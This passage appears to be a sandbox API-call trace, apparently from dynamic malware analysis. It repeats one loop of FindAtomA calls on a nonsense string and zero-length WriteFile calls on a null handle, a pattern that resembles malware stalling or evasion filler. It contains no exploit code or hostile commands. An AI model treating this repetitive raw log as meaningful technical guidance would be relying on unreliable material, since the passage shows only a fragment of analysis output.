hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.439] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.439] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.440] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.440] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.441] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.441] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.441] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.441] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.441] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.442] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.442] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.442] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.442] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.442] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.442] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.443] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.443] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.443] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.443] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.443] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.443] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.443] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.443] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.443] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.443] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.444] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.444] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.444] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.444] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.444] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.444] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.444] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.445] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.445] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.445] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.445] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.445] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.445] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.446] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.446] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.447] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.447] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.448] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.448] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.449] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.449] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.450] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.450] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.450] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.450] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.450] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.450] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.452] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.452] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.452] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.453] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.453] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.454] WriteFile (in: hFile=0x0, lpBuffer=0x0, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fe8c, lpOverlapped=0x0) returned 0 [0036.454] FindAtomA (lpString="deseyile mejevuxotipufi teyiyapelita") returned 0x0 [0036.454] WriteFile (in: hFile=0x0, lpBuffer=0x0, 